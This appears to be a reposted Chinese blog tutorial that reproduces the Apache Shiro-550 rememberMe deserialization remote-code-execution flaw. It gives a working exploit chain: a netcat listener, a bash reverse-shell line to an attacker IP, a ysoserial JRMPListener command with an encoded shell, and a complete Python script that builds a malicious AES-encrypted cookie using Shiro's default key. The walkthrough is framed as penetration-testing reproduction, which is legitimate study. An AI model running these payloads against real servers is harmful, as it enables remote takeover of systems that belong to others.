Shiro rememberMe反序列化漏洞(Shiro-550)复现

程序员文章站 2022-06-18 23:45:11

欢迎到我的博客查看原文：http://www.xpshuai.cn/posts/40239/漏洞原理Apache Shiro框架提供了记住密码的功能（RememberMe），用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值，先base64解码然后AES解密再反序列化，就导致了反序列化RCE漏洞。Payload产生的过程：命令=>序列化=>AES加密=>base64编码=>RememberMe Cookie值在整个漏洞利用过....

欢迎到我的博客查看原文：http://www.xpshuai.cn/posts/40239/

漏洞原理

Apache Shiro框架提供了记住密码的功能（RememberMe），用户登录成功后会生成经过加密并编码的cookie。在服务端对rememberMe的cookie值，先base64解码然后AES解密再反序列化，就导致了反序列化RCE漏洞。
Payload产生的过程：
命令=>序列化=>AES加密=>base64编码=>RememberMe Cookie值
在整个漏洞利用过程中，比较重要的是AES加密的密钥，如果没有修改默认的密钥那么就很容易就知道密钥了,Payload构造起来也是十分的简单。

影响版本

Apache Shiro < 1.2.4

特征判断

返回包中包含rememberMe=deleteMe字段

演示

文中的配图有点不一致，别介意，环境问题没在同一个时间测试

系统界面如图

Shiro rememberMe反序列化漏洞(Shiro-550)复现

抓包查看

可以看到是Shiro

1.检查是否存在默认的key

工具链接：https://github.com/insightglacier/Shiro_exploit

python shiro_exploit.py -u http://<IP>:7080

检测的key保存下来一会用

2.制作反弹shell代码

2.1 vps监听端口

nc -lvvp 7788

Shiro rememberMe反序列化漏洞(Shiro-550)复现

2.2 Java Runtime 配合 bash 编码，
在线编码地址：http://www.jackson-t.ca/runtime-exec-payloads.html

bash -i >& /dev/tcp/202.xx.xx.xx/7788 0>&1	# ip为攻击机的地址

Shiro rememberMe反序列化漏洞(Shiro-550)复现

3.通过ysoserial中JRMP监听模块，监听6666端口并执行反弹shell命令

上一步的反弹shell的命令编码结果写到下面

java -cp ysoserial.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections6 'bash -c {echo,YmFzaCAtxxxxxxzYuxxxxxxxxxxxxQ==}|{base64,-d}|{bash,-i}'	# 这里用的CommonsCollections4

Shiro rememberMe反序列化漏洞(Shiro-550)复现

4.使用shiro.py 生成Payload

python shiro.py 122.xx.xx.xx:6666

Shiro rememberMe反序列化漏洞(Shiro-550)复现

其中shiro.py代码如下：

import sys
import uuid
import base64
import subprocess
from Crypto.Cipher import AES
def encode_rememberme(command):
    popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'CommonsCollections6', command], stdout=subprocess.PIPE)	# 这里要注意用哪个JRMPClient
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = base64.b64decode("fCq+/xW488hMTCD+cmJ3aQ==")	# 这里的key要提前枚举出来
    iv = uuid.uuid4().bytes
    encryptor = AES.new(key, AES.MODE_CBC, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext

if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])   
print "rememberMe={0}".format(payload.decode())

5.构造数据包，伪造cookie，发送Payload.

Shiro rememberMe反序列化漏洞(Shiro-550)复现

6.nc监听端口，shell成功反弹

Shiro rememberMe反序列化漏洞(Shiro-550)复现

PS：后来发现这个好用的工具，一键检测&getshell，好用极了

我应该去学学java编程了，看大佬们写的各种工具，羡慕极了

本文地址：https://blog.csdn.net/qq_37622608/article/details/109810381

相关标签：渗透测试 security Shiro反序列化 Shiro-550 漏洞复现

上一篇： C语言Windows程序开发—MessageBox函数介绍【第01天】

下一篇： vue.js组件之基础篇

Shiro rememberMe反序列化漏洞(Shiro-550)复现

漏洞原理

影响版本

特征判断

演示

系统界面如图

抓包查看

1.检查是否存在默认的key

2.制作反弹shell代码

3.通过ysoserial中JRMP监听模块，监听6666端口并执行反弹shell命令

4.使用shiro.py 生成Payload

5.构造数据包，伪造cookie，发送Payload.

6.nc监听端口，shell成功反弹

Shiro rememberMe反序列化漏洞(Shiro-550)复现

漏洞复现系列--Shiro RememberMe 1.2.4 反序列化漏洞

Shiro rememberMe反序列化漏洞(Shiro-550)复现